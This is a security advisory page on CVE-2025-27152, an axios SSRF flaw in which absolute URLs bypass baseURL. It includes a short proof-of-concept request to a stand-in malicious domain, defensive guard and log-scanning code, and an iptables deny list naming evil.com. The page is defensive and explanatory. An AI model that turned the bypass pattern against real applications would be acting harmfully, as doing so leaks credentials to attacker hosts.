SentinelOne
CVE Vulnerability Database

CVE-2025-27152: Axios HTTP Client SSRF Vulnerability

CVE-2025-27152 is an SSRF vulnerability in Axios HTTP client that allows attackers to bypass baseURL settings and send requests to arbitrary URLs, risking credential leakage. This article covers the technical details, affected versions, security impact, and mitigation strategies.


CVE-2025-27152 Overview

axios is a promise-based HTTP client for the browser and node.js. The issue occurs when an absolute URL, rather than a protocol-relative one, is passed to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, so a caller-controlled URL can redirect the request (together with any default headers, such as credentials) to an arbitrary host, potentially causing SSRF and credential leakage. This issue affects both server-side and client-side usage of axios. This issue is fixed in version 1.8.2.

Critical Impact

The vulnerability in axios could lead to Server-Side Request Forgery (SSRF) and credential leakage, impacting confidentiality and integrity.

Affected Products

  • axios (vendor: axios)

Discovery Timeline

  • Not Available - Vulnerability discovered (discoverer not available)
  • Not Available - Responsible disclosure to axios
  • Not Available - CVE CVE-2025-27152 assigned
  • Not Available - axios releases security patch
  • 2025-03-07T16:15:38.773 - CVE CVE-2025-27152 published to NVD
  • 2025-09-22T18:52:22.807 - Last updated in NVD database

Technical Details for CVE-2025-27152

Vulnerability Analysis

The vulnerability arises when axios receives an absolute URL instead of a protocol-relative or path-only URL. In that case the baseURL configuration is bypassed: the request goes to the host named in the absolute URL, so an application that builds request URLs from untrusted input can be made to contact unintended destinations, which facilitates SSRF and can leak credentials attached to the request.

Root Cause

The root cause is the mishandling of URL configurations within axios, where absolute URLs take precedence over a predefined baseURL.

Attack Vector

This vulnerability is exploited over the network: an attacker who can influence the URL an application passes to axios supplies an absolute URL, diverting the request (and any default headers it carries) to an endpoint of the attacker's choosing instead of the configured baseURL.

```javascript
// Example exploitation code (sanitized)
const axios = require('axios');

axios.defaults.baseURL = 'https://safe-domain.com';
// Absolute URL: in affected versions the request goes to malicious-domain.com,
// and baseURL is silently ignored.
axios.get('http://malicious-domain.com/data')
  .then(response => console.log(response))
  .catch(error => console.error(error));
```
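The following is an added example, not code from the SentinelOne page or from the axios project. It reproduces the path-building rule the page describes (an absolute request URL wins over baseURL) in a dependency-free stand-in, then shows the application-side guard a defender would add: resolve the final URL and refuse the request unless its origin matches baseURL's origin. The `ABSOLUTE_URL` regex mirrors the shape of axios's own absolute-URL test; `buildFullPath`, `safeFullPath` and `makeClient` are hypothetical names.

```javascript
// Added example (not from the page or the axios project). Models the bypass and
// a same-origin guard; all function names are hypothetical.

// Same shape as axios's absolute-URL test: "scheme://" or a bare "//"
// (protocol-relative) both count as absolute.
const ABSOLUTE_URL = /^([a-z][a-z\d+\-.]*:)?\/\//i;

// Affected behaviour: baseURL is only applied to relative paths. An absolute
// URL is returned untouched, so baseURL is bypassed.
function buildFullPath(baseURL, requestedURL) {
  if (baseURL && !ABSOLUTE_URL.test(requestedURL)) {
    return baseURL.replace(/\/+$/, '') + '/' + requestedURL.replace(/^\/+/, '');
  }
  return requestedURL; // absolute URL: baseURL silently ignored
}

// Defensive guard: resolve the final URL against baseURL and require the same
// origin (scheme + host + port). A protocol-relative "//other-host/x" resolves
// to baseURL's scheme on the other host, so it is rejected as well.
function safeFullPath(baseURL, requestedURL) {
  const full = buildFullPath(baseURL, requestedURL);
  const base = new URL(baseURL);
  const target = new URL(full, base);
  if (target.origin !== base.origin) {
    throw new Error(`blocked request to ${target.origin} (expected ${base.origin})`);
  }
  return target.href;
}

// Minimal stand-in for an axios instance so the example runs offline; a real
// client would perform the request after the guard passes.
function makeClient(baseURL) {
  return {
    get(url) {
      return safeFullPath(baseURL, url);
    },
  };
}

// Demo: one relative path (allowed) and two cross-origin URLs (blocked).
const client = makeClient('https://safe-domain.com');
console.log(client.get('/data'));
for (const url of ['http://malicious-domain.com/data', '//malicious-domain.com/data']) {
  try {
    client.get(url);
  } catch (e) {
    console.log(e.message);
  }
}
```

With axios 1.8.2 or later the same effect is available from the library itself: the `allowAbsoluteUrls` config option, when set to `false`, makes baseURL authoritative for every request. The guard above is still useful as a defence in depth and as a migration check for code that cannot upgrade immediately.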

Detection Methods for CVE-2025-27152

Indicators of Compromise

  • Requests being sent to unexpected or malicious domains
  • Unusual outbound traffic patterns
  • Log entries showing unauthorized data access or API calls

Detection Strategies

  • Analyze network traffic for unexpected outbound requests originating from axios clients.
  • Implement logging mechanisms to capture complete request details and compare them against known safe domains.
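As an added example of the second strategy (not code from the page), the function below scans request-log lines for outbound requests whose host is not on an allowlist derived from the configured baseURL. The log format, the allowlist and the sample lines are constructed for the example; `findUnexpectedHosts` is a hypothetical name.

```javascript
// Added example (not from the page). Flags logged outbound requests whose host
// is outside an allowlist; log format and sample data are constructed.

// Hosts the application is expected to talk to (constructed allowlist).
const ALLOWED_HOSTS = new Set(['safe-domain.com', 'api.safe-domain.com']);

// Constructed sample lines: "<timestamp> <method> <resolved-url> <status>".
const SAMPLE_LOG = [
  '2025-03-07T16:15:38Z GET https://safe-domain.com/data 200',
  '2025-03-07T16:15:39Z GET http://malicious-domain.com/data 200',
  '2025-03-07T16:15:40Z POST https://api.safe-domain.com/v1/items 201',
  '2025-03-07T16:15:41Z GET https://safe-domain.com.attacker.example/data 200',
  'not a request line',
];

// Returns { flagged, skipped }: flagged entries name the unexpected host,
// skipped counts lines that do not parse as a request record.
function findUnexpectedHosts(lines, allowedHosts) {
  const flagged = [];
  let skipped = 0;
  for (const line of lines) {
    const parts = line.trim().split(/\s+/);
    if (parts.length < 3) { skipped += 1; continue; }
    let url;
    try {
      url = new URL(parts[2]);
    } catch (e) {
      skipped += 1; // not an absolute URL: cannot attribute a host
      continue;
    }
    // Exact host match: a lookalike such as safe-domain.com.attacker.example
    // must not pass a suffix or substring comparison.
    if (!allowedHosts.has(url.hostname)) {
      flagged.push({ timestamp: parts[0], method: parts[1], host: url.hostname, url: url.href });
    }
  }
  return { flagged, skipped };
}

const result = findUnexpectedHosts(SAMPLE_LOG, ALLOWED_HOSTS);
for (const f of result.flagged) {
  console.log(`${f.timestamp} unexpected host ${f.host} (${f.method} ${f.url})`);
}
console.log(`${result.skipped} line(s) skipped`);
```

In an axios application the log lines themselves can come from a request interceptor (`axios.interceptors.request.use`), which sees both `config.baseURL` and `config.url` before the request is sent; logging the fully resolved URL rather than the caller-supplied path is what makes this comparison possible.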

Monitoring Recommendations

  • Utilize anomaly detection systems to identify irregular communication patterns.
  • Set up alerts for access to unauthorized or unexpected domain names.

How to Mitigate CVE-2025-27152

Immediate Actions Required

  • Upgrade to axios version 1.8.2 or later
  • Review all axios call sites and configurations so that request URLs built from untrusted input cannot become absolute URLs, and ensure no hardcoded absolute URLs bypass the intended baseURL
  • Implement strict outbound traffic rules and domain allowlisting

Patch Information

The issue has been resolved in axios version 1.8.2. All users of earlier versions should upgrade immediately.

Workarounds

  • Implement network-level access controls to restrict requests to known safe endpoints only.

```bash
# Configuration example: drop outbound traffic to known-bad hosts.
# Note: iptables resolves a hostname given to -d once, when the rule is
# inserted, so a host whose IP changes is not covered; an allowlist of
# permitted destinations is more robust than a denylist.
yum install iptables
iptables -A OUTPUT -d evil.com -j DROP
iptables -A OUTPUT -d malicious-site.com -j DROP
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
